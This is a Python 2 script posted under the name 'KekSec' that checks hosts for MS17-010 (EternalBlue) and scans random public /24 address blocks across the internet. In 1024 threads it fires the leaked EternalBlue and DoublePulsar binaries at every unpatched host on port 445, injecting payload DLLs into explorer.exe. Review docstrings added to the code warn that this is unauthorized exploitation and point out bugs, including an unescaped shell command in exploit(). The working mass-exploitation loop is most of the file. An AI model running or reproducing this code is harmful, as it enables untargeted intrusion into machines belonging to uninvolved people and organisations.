KekSec

MS17-010 scanner.py

Jun 4th, 2018
  1. from impacket import smb, smbconnection, nt_errors
  2. from impacket.uuid import uuidtup_to_bin
  3. from mysmb import MYSMB
  4. from impacket import smb
  5. from struct import pack
  6. import socket
  7. import time
  8. import socket
  9. import threading
  10. import random
  11. import binascii
  12. import time
  13. import itertools
  14. import os
  15.  
'''
MS17-010 (EternalBlue) vulnerability check wrapped in a mass-scan/exploit loop.

What this listing actually contains:
- check(target): decide whether a host is patched for MS17-010.
- The "find accessible named pipe" feature this header originally promised is
  NOT implemented here: the `pipes` table below is defined but never read.

Python 2 only (it uses print statements). Depends on impacket and on a local
`mysmb` module providing MYSMB, which is not part of this listing.

WARNING (review): everything past check() selects random public /24 blocks and
runs the leaked EternalBlue/DoublePulsar binaries against any host with 445
open. That is unauthorized, indiscriminate exploitation. Do not run this
outside an isolated lab you own; treat the check() function as the only part
with a legitimate (authorized assessment) use.
'''

# SMB credentials used by check(). Both empty here, i.e. the login is
# presumably attempted as an anonymous/null session -- confirm against MYSMB.
USERNAME = ''
PASSWORD = ''

# NDR64 transfer-syntax tuple. Defined but unused anywhere in this listing.
NDR64Syntax = ('71710533-BEBA-4937-8319-B5DBEF9CCC36', '1.0')

# RPC interface UUIDs (binary form) for the services behind the named pipes
# listed in `pipes`. None of these are referenced by the code shown here.
MSRPC_UUID_BROWSER = uuidtup_to_bin(('6BFFD098-A112-3610-9833-012892020162','0.0'))
MSRPC_UUID_SPOOLSS = uuidtup_to_bin(('12345678-1234-ABCD-EF00-0123456789AB','1.0'))
MSRPC_UUID_NETLOGON = uuidtup_to_bin(('12345678-1234-ABCD-EF00-01234567CFFB','1.0'))
MSRPC_UUID_LSARPC = uuidtup_to_bin(('12345778-1234-ABCD-EF00-0123456789AB','0.0'))
MSRPC_UUID_SAMR = uuidtup_to_bin(('12345778-1234-ABCD-EF00-0123456789AC','1.0'))

# Pipe name -> interface UUID. Leftover from the named-pipe enumeration that
# this listing does not implement; nothing below consults it.
pipes = {
    'browser' : MSRPC_UUID_BROWSER,
    'spoolss' : MSRPC_UUID_SPOOLSS,
    'netlogon' : MSRPC_UUID_NETLOGON,
    'lsarpc' : MSRPC_UUID_LSARPC,
    'samr' : MSRPC_UUID_SAMR,
}
  40.  
def check(target):
    """Return True if `target` looks unpatched for MS17-010, else False.

    Flow: SMB login with the module-level USERNAME/PASSWORD, tree-connect to
    IPC$, then send a TRANS_PEEK_NMPIPE transaction. A reply of
    STATUS_INSUFF_SERVER_RESOURCES (0xC0000205) is taken as "not patched";
    any other status -- including unrelated errors -- is reported as
    "patched", so a transport or protocol failure at that point is a silent
    false negative rather than an error.

    Side effects: prints the login result, the server OS string and the
    verdict. The SMB session and tree connect are never explicitly torn
    down here; presumably released when `conn` is garbage-collected --
    confirm against MYSMB.
    """
    conn = MYSMB(target)
    try:
        conn.login(USERNAME, PASSWORD)
    except smb.SessionError as e:
        print('Login failed: ' + nt_errors.ERROR_MESSAGES[e.error_code][0])
        return False
    finally:
        # NOTE(review): `finally` runs on the failure path too, so
        # get_server_os() is called even after a failed login; whether that
        # can itself raise depends on MYSMB internals not shown here.
        print('Target OS: ' + conn.get_server_os())

    tid = conn.tree_connect_andx('\\\\'+target+'\\'+'IPC$')
    conn.set_default_tid(tid)


    # test if target is vulnerable
    # A PeekNamedPipe transaction against the (default, invalid) FID; the
    # oversized maxParameterCount is part of the probe. Only the NT status
    # of the reply is inspected.
    TRANS_PEEK_NMPIPE = 0x23
    recvPkt = conn.send_trans(pack('<H', TRANS_PEEK_NMPIPE), maxParameterCount=0xffff, maxDataCount=0x800)
    status = recvPkt.getNTStatus()
    if status == 0xC0000205: # STATUS_INSUFF_SERVER_RESOURCES
        print('The target is not patched')
        return True
    else:
        # Any other status (not just "patched") lands here -- see docstring.
        print('The target is patched')
        return False
  65.  
def exploit(IP):
    """Run the leaked EternalBlue and DoublePulsar binaries against `IP`.

    WARNING (review): this is the weaponized stage of the script -- it
    launches a remote code-execution exploit and then injects a DLL into
    explorer.exe on the target. Running it against hosts you are not
    authorized to attack is a crime. Kept here only so the listing can be
    reviewed; do not execute.

    Review notes, all visible in the three lines below:
    - `IP` is concatenated unescaped into a shell command (os.popen). The
      callers in this file pass dotted-decimal strings, but the function
      itself performs no validation, so any other caller is a shell-injection
      risk.
    - The binaries and both payload DLLs are referenced by bare file name,
      i.e. expected in the current working directory.
    - Output is only printed; exit status is never checked, and both the x86
      and x64 DLL injections are fired blindly regardless of whether
      EternalBlue succeeded or which architecture the target is.
    - Python 2 print statements.
    """
    print os.popen("wine Eternalblue-2.2.0.exe --TargetIp " + IP).read()
    print os.popen("wine Doublepulsar-1.3.1.exe --TargetIp " + IP + " --Function RunDll --DllPayload launcher.x86.dll --ProcessName explorer.exe").read()
    print os.popen("wine Doublepulsar-1.3.1.exe --TargetIp " + IP + " --Function RunDll --DllPayload launcher.x64.dll --ProcessName explorer.exe").read()
  70.  
def gen_IP_block():
    """Return a random /24 as an ip_range() pattern, e.g. "53.17.201.1-255".

    The first octet is redrawn until it is not in `not_valid`. NOTE(review):
    filtering on the first octet alone is not a correct private/reserved
    address filter -- it is both over-inclusive (drops entire /8s such as
    172.0.0.0/8 and 192.0.0.0/8) and under-inclusive (other non-routable
    ranges are kept). The second and third octets use randrange(1,256), so
    x.0.y.z and x.y.0.z blocks are never produced. Together with HaxThread
    this is what makes the script an internet-wide, untargeted scanner.
    """
    not_valid = [10,127,169,172,192]
    first = random.randrange(1,256)
    while first in not_valid:
        first = random.randrange(1,256)
    ip = ".".join([str(first),str(random.randrange(1,256)),
                   str(random.randrange(1,256))])
    return ip+".1-255"
  79.  
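def ip_range(input_string):
    """Expand a dotted address pattern into individual IPv4 address strings.

    Each dot-separated field is either a single number ("10") or an
    inclusive range ("1-255"); the cartesian product of all fields is
    yielded in order, e.g. "10.0.0.1-3" -> "10.0.0.1", "10.0.0.2",
    "10.0.0.3".

    Fields are not validated: values outside 0-255 and a field count other
    than four are passed through unchanged. Callers are expected to supply
    well-formed patterns.
    """
    octets = input_string.split('.')
    # list(...) so this also runs on Python 3, where map() is lazy and has no
    # len(); the original relied on Python 2's eager map returning a list.
    chunks = [list(map(int, octet.split('-'))) for octet in octets]
    ranges = [range(c[0], c[1] + 1) if len(c) == 2 else c for c in chunks]

    for address in itertools.product(*ranges):
        yield '.'.join(map(str, address))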
def Scan(IP):
    """Probe TCP/445 on `IP`; if open and check() says unpatched, exploit it.

    WARNING (review): this couples detection directly to exploitation --
    every host that fails check() is attacked with no operator confirmation.

    Review notes grounded in the body:
    - `except Exception: pass` swallows everything: connection timeouts (the
      expected case), but also errors raised inside check() and exploit(),
      so failures are indistinguishable from "port closed".
    - The socket is only closed on the success path; if connect() raises,
      `s` is never closed (no `finally`/`with`), and the descriptor lingers
      until garbage collection.
    - 5 s connect timeout, hard-coded.
    """
    try:
        s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(5)
        s.connect((IP, 445))
        s.close()
        if check(IP):
            exploit(IP)
    except Exception as e:
        pass
  97.  
def HaxThread():
    """Worker body: forever pick a random /24 and Scan() every address in it.

    Never returns -- `while 1` has no exit condition. Each iteration walks a
    fresh random block from gen_IP_block(), so the scan is untargeted and
    unbounded. Per-host errors are already swallowed inside Scan(), so
    nothing here can terminate the loop short of killing the process.
    """
    while 1:
        for IP in ip_range(gen_IP_block()):
            Scan(IP)
  102.  
  103.  
if __name__ == "__main__":
    # Entry point: spin up 1024 HaxThread workers. Review notes:
    # - The bare `except: pass` hides any thread-creation failure (e.g.
    #   resource exhaustion), and `threads` only counts successful starts,
    #   so the final message may report fewer than 1024 without explanation.
    # - Threads are created with the default daemon=False and HaxThread
    #   never returns, so the interpreter will not exit on its own after the
    #   print below; the process has to be killed.
    # - Python 2 print statement.
    threads = 0
    for i in range(1024):
        try:
            threading.Thread(target=HaxThread, args=()).start()
            threads+=1
        except:
            pass
    print "[+] Started " + str(threads) + " threads!"